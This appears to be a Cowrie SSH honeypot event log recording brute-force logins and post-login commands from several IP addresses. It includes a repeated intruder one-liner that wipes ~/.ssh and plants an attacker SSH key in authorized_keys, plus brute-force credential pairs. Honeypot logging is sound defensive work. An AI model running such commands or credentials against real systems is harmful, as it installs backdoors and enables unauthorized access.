{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:10:39.654714Z","src_ip":"27.112.78.245","session":"34fb1208350f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:10:39.925592Z","src_ip":"27.112.78.245","session":"34fb1208350f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:10:39.926504Z","src_ip":"27.112.78.245","session":"34fb1208350f"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":59698,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6ebe31113ee","protocol":"ssh","message":"New connection: 27.112.78.245:59698 (1.2.3.4:22) [session: e6ebe31113ee]","sensor":"my-vps","timestamp":"2025-08-26T00:10:40.189686Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:10:40.190614Z","src_ip":"27.112.78.245","session":"e6ebe31113ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:10:40.458918Z","src_ip":"27.112.78.245","session":"e6ebe31113ee"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:10:42.114968Z","src_ip":"27.112.78.245","session":"e6ebe31113ee"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:10:43.386774Z","src_ip":"27.112.78.245","session":"e6ebe31113ee"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":59706,"dst_ip":"1.2.3.4","dst_port":22,"session":"88f893ba9bb6","protocol":"ssh","message":"New connection: 27.112.78.245:59706 (1.2.3.4:22) [session: 88f893ba9bb6]","sensor":"my-vps","timestamp":"2025-08-26T00:10:43.683861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:10:43.684835Z","src_ip":"27.112.78.245","session":"88f893ba9bb6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:10:43.952770Z","src_ip":"27.112.78.245","session":"88f893ba9bb6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:10:45.067323Z","src_ip":"27.112.78.245","session":"88f893ba9bb6"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:10:45.335832Z","src_ip":"27.112.78.245","session":"88f893ba9bb6"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:10:45.336753Z","src_ip":"27.112.78.245","session":"34fb1208350f"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":35994,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7848a8200e4","protocol":"ssh","message":"New connection: 45.88.8.215:35994 (1.2.3.4:22) [session: f7848a8200e4]","sensor":"my-vps","timestamp":"2025-08-26T00:10:53.453919Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:10:53.732919Z","src_ip":"45.88.8.215","session":"f7848a8200e4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T00:10:53.733568Z","src_ip":"45.88.8.215","session":"f7848a8200e4"}
{"eventid":"cowrie.login.success","username":"root","password":"Jairam@123","message":"login attempt [root/Jairam@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:10:54.603433Z","src_ip":"45.88.8.215","session":"f7848a8200e4"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:10:55.466934Z","src_ip":"45.88.8.215","session":"f7848a8200e4"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":57682,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d1180047e7e","protocol":"ssh","message":"New connection: 45.88.8.186:57682 (1.2.3.4:22) [session: 5d1180047e7e]","sensor":"my-vps","timestamp":"2025-08-26T00:11:50.430968Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:11:50.960741Z","src_ip":"45.88.8.186","session":"5d1180047e7e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T00:11:50.964482Z","src_ip":"45.88.8.186","session":"5d1180047e7e"}
{"eventid":"cowrie.login.success","username":"root","password":"bbbbbb","message":"login attempt [root/bbbbbb] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:11:53.111516Z","src_ip":"45.88.8.186","session":"5d1180047e7e"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:11:53.823025Z","src_ip":"45.88.8.186","session":"5d1180047e7e"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":51690,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6274bd35b85","protocol":"ssh","message":"New connection: 27.112.78.245:51690 (1.2.3.4:22) [session: c6274bd35b85]","sensor":"my-vps","timestamp":"2025-08-26T00:12:09.050610Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:12:09.051524Z","src_ip":"27.112.78.245","session":"c6274bd35b85"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:12:09.311733Z","src_ip":"27.112.78.245","session":"c6274bd35b85"}
{"eventid":"cowrie.login.success","username":"root","password":"Fj123456","message":"login attempt [root/Fj123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:12:10.409089Z","src_ip":"27.112.78.245","session":"c6274bd35b85"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:12:11.803906Z","src_ip":"27.112.78.245","session":"c6274bd35b85"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:12:11.804584Z","src_ip":"27.112.78.245","session":"c6274bd35b85"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:12:11.805333Z","src_ip":"27.112.78.245","session":"c6274bd35b85"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:12:12.066241Z","src_ip":"27.112.78.245","session":"c6274bd35b85"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:12:12.641476Z","src_ip":"27.112.78.245","session":"c6274bd35b85"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:12:12.642143Z","src_ip":"27.112.78.245","session":"c6274bd35b85"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:12:12.904714Z","src_ip":"27.112.78.245","session":"c6274bd35b85"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:12:12.905632Z","src_ip":"27.112.78.245","session":"c6274bd35b85"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":51698,"dst_ip":"1.2.3.4","dst_port":22,"session":"617a83fc7e2a","protocol":"ssh","message":"New connection: 27.112.78.245:51698 (1.2.3.4:22) [session: 617a83fc7e2a]","sensor":"my-vps","timestamp":"2025-08-26T00:12:13.164420Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:12:13.165038Z","src_ip":"27.112.78.245","session":"617a83fc7e2a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:12:13.425226Z","src_ip":"27.112.78.245","session":"617a83fc7e2a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:12:14.507935Z","src_ip":"27.112.78.245","session":"617a83fc7e2a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:12:15.771007Z","src_ip":"27.112.78.245","session":"617a83fc7e2a"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":41486,"dst_ip":"1.2.3.4","dst_port":22,"session":"92301e0b58ea","protocol":"ssh","message":"New connection: 27.112.78.245:41486 (1.2.3.4:22) [session: 92301e0b58ea]","sensor":"my-vps","timestamp":"2025-08-26T00:12:16.062279Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:12:16.069827Z","src_ip":"27.112.78.245","session":"92301e0b58ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:12:16.328639Z","src_ip":"27.112.78.245","session":"92301e0b58ea"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:12:17.366234Z","src_ip":"27.112.78.245","session":"92301e0b58ea"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:12:17.630078Z","src_ip":"27.112.78.245","session":"92301e0b58ea"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:12:17.631019Z","src_ip":"27.112.78.245","session":"c6274bd35b85"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":37380,"dst_ip":"1.2.3.4","dst_port":22,"session":"aece91468df6","protocol":"ssh","message":"New connection: 27.112.78.245:37380 (1.2.3.4:22) [session: aece91468df6]","sensor":"my-vps","timestamp":"2025-08-26T00:13:38.626586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:13:38.627286Z","src_ip":"27.112.78.245","session":"aece91468df6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp